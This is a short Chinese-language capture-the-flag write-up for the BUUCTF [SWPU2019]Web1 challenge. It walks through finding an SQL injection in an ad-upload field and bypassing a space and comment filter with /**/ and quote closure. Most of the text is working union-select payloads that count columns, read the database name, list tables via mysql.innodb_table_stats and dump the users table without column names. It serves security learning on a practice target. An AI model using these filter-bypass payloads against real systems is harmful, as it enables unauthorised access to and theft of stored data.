146,[1] BUUCTF WEB [SWPU2019]Web1
进入靶场
先注册
试着发一个
看看源代码
所以上传的广告应该是注入点
再上传看看
历史记录里有SQL语句,那就试试
被过滤了
从基本的开始试试
报错了
是单引号闭合
尝试看看过滤了什么
我尝试的1和空格以及1空格2,但是发现最后空格没有出现
猜测第一次传入的sql语句也没有正确传入
不过%23可以
先把空格和#替换掉
在union select后半部分报错了
那就先只用union select找注入点
多尝试了几次发现用()解决过滤了空格的方法行不通
用/**/
没闭合
用注释符不行
那就闭合
1'/**/union/**/select/**/1,2'
I fu le
1'/**/union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
✌
找到注入点了
1'/**/union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
1'/**/union/**/select/**/1,database(),group_concat(table_name),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/from/**/mysql.innodb_table_stats/**/where/**/database_name="web1"'
1'/**/union/**/select/**/1,database(),(select/**/group_concat(b)/**/from/**/(select/**/1,2/**/as/**/a,3/**/as/**/b/**/union/**/select/**/*/**/from/**/users)a),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22'
